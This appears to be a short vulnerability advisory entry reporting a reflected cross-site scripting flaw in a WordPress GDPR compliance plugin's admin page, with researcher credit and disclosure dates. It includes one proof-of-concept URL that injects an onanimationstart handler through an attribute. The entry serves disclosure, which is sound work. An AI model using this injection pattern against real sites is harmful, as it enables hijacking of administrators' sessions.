The plugin does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue
https://example.com/wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28/XSS/%29+style%3Danimation-name%3Arotation+x
Krzysztof Zając
Krzysztof Zając
Yes
2022-02-21 (about 11 months ago)
2022-02-21 (about 11 months ago)
2022-04-16 (about 9 months ago)